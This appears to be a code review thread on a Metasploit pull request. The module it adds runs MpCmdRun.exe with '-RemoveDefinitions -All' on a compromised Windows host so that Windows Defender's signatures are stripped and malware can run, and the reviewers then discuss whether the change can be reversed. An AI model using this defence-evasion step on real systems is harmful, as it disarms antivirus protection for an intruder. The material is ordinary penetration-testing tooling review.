modules/post/windows/manage/disable_windowsdefender_signatures.rb

```diff
@@ -0,0 +1,39 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Post
+  include Msf::Post::File
+  include Msf::Post::Windows::Priv
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'          => 'Disable Windows Defender Signatures',
+      'Description'   => %q{
+        This module with appropriate rights let to use the Windows Defender command-line utility a run and automation
+        tool (mpcmdrun.exe) in order to disable all the signatures available installed for the compromised machine.
+        The tool is prominently used for scheduling scans and updating the signature or definition files,
+        but there is a switch created to restore the installed signature definitions to a previous backup copy or
+        to the original default set of signatures which is none, disabling all the signatures and allowing malware
+        to execute even with the Windows Defender solution enabled.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['metasploit@[at]csiete.org',
+      'luisco100 <luisco100[at]gmail.com>'], # Module author
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      ))
+  end
+
+  def run
+    unless is_system?()
+      print_status("Remove Definitions Windows Defender")
+      file_path = "C:\\Program Files\\Windows Defender\\MpCmdRun.exe"
+      if exist?(file_path)
+        cmd = cmd_exec('cmd.exe', "/c \"#{file_path}\" -RemoveDefinitions -All")
```

Comment:
Is this something that is reverse-able?  This seems less like disabling and more like destroying?

Reply:
It just puts older signatures back in place:

-RemoveDefinitions [-All] | Restores the installed signature definitions to a previous backup copy or to the original default set of signatures

https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-antivirus/command-line-arguments-windows-defender-antivirus

Reply:
So, easy to reverse, just update through windows update again. Kind of a misleading name.

Reply:
Not really reverse.... It will update the sigs, but that can be tricky if they are not connected to the server.  In testing, the session does not hang, but the update process can hang for several minutes before it fails.